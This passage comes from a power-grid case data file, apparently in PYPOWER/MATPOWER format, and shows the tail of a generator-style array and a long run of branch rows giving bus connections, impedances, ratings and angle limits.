0.002188, 0, 9999, -9999, 1.0, 100, 1, 15.438042, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1508, 0.035206, 0, 9999, -9999, 1.0, 100, 1, 0.065259, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1510, 13.77246, 0, 9999, -9999, 1.0, 100, 1, 107.008141, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1511, 21.441181, 0, 9999, -9999, 1.0, 100, 1, 155.22192, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1512, 8.160231, 0, 9999, -9999, 1.0, 100, 1, 64.130052, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1513, 2.493411, 0, 9999, -9999, 1.0, 100, 1, 23.051786, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1514, 0.000204, 0, 9999, -9999, 1.0, 100, 1, 0.027711, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1516, 0.008501, 0, 9999, -9999, 1.0, 100, 1, 0.02881, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1517, 0.638383, 0, 9999, -9999, 1.0, 100, 1, 1.286804, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1518, 0.188229, 0, 9999, -9999, 1.0, 100, 1, 0.670542, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [1519, 0.013064, 0, 9999, -9999, 1.0, 100, 1, 0.04654, 0.0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] ]) ppc["branch"] = array([ [586, 1, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [589, 108, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [590, 108, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [593, 112, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [595, 115, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [598, 118, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [599, 119, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [601, 119, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [602, 121, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [603, 526, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [607, 127, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [608, 127, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [609, 529, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [612, 493, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [614, 130, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [616, 132, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [617, 133, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [618, 133, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [619, 134, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [624, 14, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [629, 145, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [632, 145, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [637, 148, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [638, 149, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [640, 153, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [641, 155, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [642, 533, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [643, 534, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [647, 536, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [652, 167, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [655, 170, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [661, 177, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [663, 178, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [666, 180, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [668, 183, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [670, 183, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [672, 185, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [681, 197, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [683, 200, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [687, 202, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [694, 21, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [695, 210, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [696, 211, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [697, 211, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [698, 212, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [702, 215, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [704, 217, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [705, 217, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [707, 219, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [713, 225, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [714, 225, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [716, 226, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [717, 227, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [719, 229, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [724, 238, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [730, 547, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [732, 247, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [735, 253, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [738, 258, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [741, 264, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [742, 264, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [743, 500, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [747, 273, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [748, 274, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [749, 274, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [750, 557, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [753, 28, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [758, 286, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [761, 288, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [762, 289, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [763, 560, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [765, 560, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [767, 292, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [769, 293, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [771, 297, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [772, 3, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [774, 300, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [777, 300, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [778, 300, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [781, 303, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [784, 563, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [785, 501, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [787, 308, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [788, 311, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [789, 565, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [791, 314, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [792, 316, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [795, 319, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [800, 326, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [801, 327, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [802, 327, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [805, 328, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [806, 328, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [808, 329, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [809, 329, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [811, 568, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [814, 570, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [816, 335, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [817, 571, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [821, 338, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [822, 339, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [826, 339, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [830, 345, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [835, 572, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [836, 572, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [837, 350, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [839, 350, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [841, 573, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [844, 352, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [845, 356, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [849, 574, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [850, 574, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [851, 575, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [853, 362, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [855, 363, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [856, 363, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [857, 365, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [858, 368, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [860, 371, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [865, 375, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [867, 376, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [869, 503, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [870, 503, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [872, 378, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [874, 576, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [875, 381, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [882, 388, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [883, 388, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [885, 393, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [886, 394, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [889, 397, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [890, 40, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [893, 400, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [894, 400, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [895, 580, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [896, 581, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [898, 403, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [900, 405, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [902, 405, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [903, 406, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [905, 413, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [906, 414, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [907, 583, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [909, 417, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [915, 423, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [917, 43, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [918, 424, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [920, 428, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [921, 428, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [922, 429, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [923, 432, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [925, 44, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [931, 439, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [935, 45, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [936, 445, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [937, 447, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [939, 450, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [940, 451, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [944, 458, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [950, 462, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [952, 47, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [958, 478, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [959, 478, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [960, 479, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [963, 481, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [965, 49, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [966, 49, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [967, 49, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [969, 486, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [971, 51, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [973, 506, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [976, 58, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [978, 491, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [982, 62, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [983, 62, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [984, 63, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [985, 63, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [986, 64, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [987, 65, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [988, 66, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [993, 67, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [994, 67, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [995, 509, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [997, 510, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [999, 70, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1000, 71, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1002, 71, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1003, 72, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1007, 511, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1008, 75, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1010, 79, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1011, 79, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1012, 81, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1014, 83, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1026, 518, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1027, 218, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1028, 221, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1029, 268, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1030, 269, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1031, 498, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1032, 1, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1033, 3, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1034, 4, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1035, 6, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1036, 7, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1037, 8, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1038, 9, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1039, 11, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1040, 14, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1041, 16, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1042, 17, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1043, 19, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1044, 21, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1045, 23, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1046, 25, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1047, 27, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1048, 28, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1049, 29, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1050, 31, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1051, 33, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1052, 34, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1053, 35, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1054, 36, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1055, 38, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1056, 39, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1057, 40, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1058, 41, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1059, 43, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1060, 44, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1061, 45, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1062, 47, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1063, 48, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1064, 49, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1065, 50, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1066, 51, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1067, 53, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1068, 54, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1069, 55, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1070, 57, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1071, 58, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1072, 59, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1073, 60, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1074, 62, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1075, 63, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1076, 64, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1077, 65, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1078, 66, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1079, 67, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1080, 70, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1081, 71, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1082, 72, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1083, 73, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1084, 75, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1085, 76, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1086, 77, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1087, 79, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1088, 80, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1089, 81, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1090, 82, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1091, 83, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1092, 84, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1093, 85, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1094, 88, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1095, 89, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1096, 90, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1097, 91, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1098, 92, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1099, 93, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1100, 97, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1101, 98, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1102, 101, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1103, 102, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1104, 103, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1105, 108, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1106, 109, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1107, 110, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1108, 111, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1109, 112, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1110, 113, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1111, 114, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1112, 115, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1113, 116, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1114, 118, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1115, 119, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1116, 121, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1117, 122, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1118, 126, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1119, 127, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1120, 130, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1121, 131, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1122, 132, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1123, 133, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1124, 134, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1125, 135, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1126, 136, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1127, 137, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1128, 139, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1129, 140, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1130, 141, 0, 1e-05, 0, 9999, 9999, 9999, 0, 